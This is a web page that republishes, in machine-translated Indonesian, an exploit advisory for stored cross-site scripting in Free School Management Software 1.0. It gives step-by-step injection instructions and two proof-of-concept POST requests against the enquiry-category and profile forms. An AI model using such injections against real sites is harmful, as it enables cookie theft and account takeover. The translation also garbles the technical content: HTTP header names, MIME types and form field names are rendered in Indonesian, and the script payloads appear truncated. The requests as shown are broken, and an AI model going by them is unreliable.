Perangkat Lunak Manajemen Sekolah Gratis 1.0 Cross Site Scripting

  • Whatsapp
Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Plugin
Sistem Manajemen Pasien Chikitsa Eksekusi Kode Jarak Jauh Plugin

News.nextcloud.asia

# Judul Eksploitasi: Perangkat Lunak Manajemen Sekolah Gratis 1.0 – ‘multiple’ Stored Cross-Site Scripting (XSS)
# Eksploitasi Penulis: fuzzyap1
# Tanggal: 7-12-2021
# Kategori: Aplikasi web
# Beranda Vendor: https://www.sourcecoster.com/php/15073/free-school-management-software.html
# Tautan Perangkat Lunak: https://www.sourcecoster.com/sites/default/files/download/jovahsource/free_and_open_source.zip
# Versi: 1.0
# Diuji pada: windows
# Halaman rentan: http://localhost/admin/enquiry_category
# Parameter Rentan: “kategori”

Deskripsi teknis:
Kerentanan XSS yang tersimpan ada di perangkat lunak manajemen Acara. Sebuah
penyerang dapat memanfaatkan kerentanan ini untuk menjalankan javascript di
nama peselancar server web, yang dapat menyebabkan pencurian cookie, perusakan wajah
dan banyak lagi.

Langkah-langkah untuk mengeksploitasi:
1) Arahkan ke http://localhost/admin/enquiry_category
2) Masukkan muatan Anda di parameter “kategori”
3) Klik “simpan”

Bukti konsep (Poc):
Payload berikut akan memungkinkan Anda untuk menjalankan javascript –
“>

POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1
Tuan rumah: localhost
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Menerima:
teks/html,aplikasi/xhtml+xml,aplikasi/xml;q=0.9,gambar/webp,*/*;q=0.8
Terima-Bahasa: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Terima-Encoding: gzip, deflate
Content-Type: multipart/form-data;
batas=—————————151631281127875309002088019539
Konten-Panjang: 490
Asal: http://localhost
Koneksi: tutup
Perujuk: http://localhost/admin/enquiry_category
Kuki: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;
ci_session = 6vl4s7keu1ucpoomv9tj4oe8an7kspa0
Peningkatan-Permintaan-Tidak Aman: 1

—————————–151631281127875309002088019539
Isi-Disposisi: formulir-data; nama=”kategori”

Ini untuk informasi ID 3″>
—————————–151631281127875309002088019539
Isi-Disposisi: formulir-data; nama = “tujuan”

Pembayaran
—————————–151631281127875309002088019539
Isi-Disposisi: formulir-data; nama = “siapa”

tutorial
—————————–151631281127875309002088019539–

Langkah-langkah untuk mengeksploitasi:
1) Arahkan ke http://localhost/admin/manage_profile
2) Masukkan payload Anda di parameter “anme”
3) Klik “simpan”

Bukti konsep (Poc):
Payload berikut akan memungkinkan Anda untuk menjalankan javascript –
“>

POST /admin/manage_profile/perbarui HTTP/1.1
Tuan rumah: localhost
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Menerima:
teks/html,aplikasi/xhtml+xml,aplikasi/xml;q=0.9,gambar/webp,*/*;q=0.8
Terima-Bahasa: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Terima-Encoding: gzip, deflate
Content-Type: multipart/form-data;
batas=—————————13285163425854907563979323722
Konten-Panjang: 519
Asal: http://localhost
Koneksi: tutup
Perujuk: http://localhost/admin/manage_profile
Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16
Peningkatan-Permintaan-Tidak Aman: 1

—————————–13285163425854907563979323722
Isi-Disposisi: formulir-data; nama=”nama”

Administrator”>
—————————–13285163425854907563979323722
Isi-Disposisi: formulir-data; nama=”email”

[email protected]
—————————–13285163425854907563979323722
Isi-Disposisi: formulir-data; nama=”file pengguna”; nama file=””
Tipe-Konten: aplikasi/aliran oktet

—————————–13285163425854907563979323722–

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.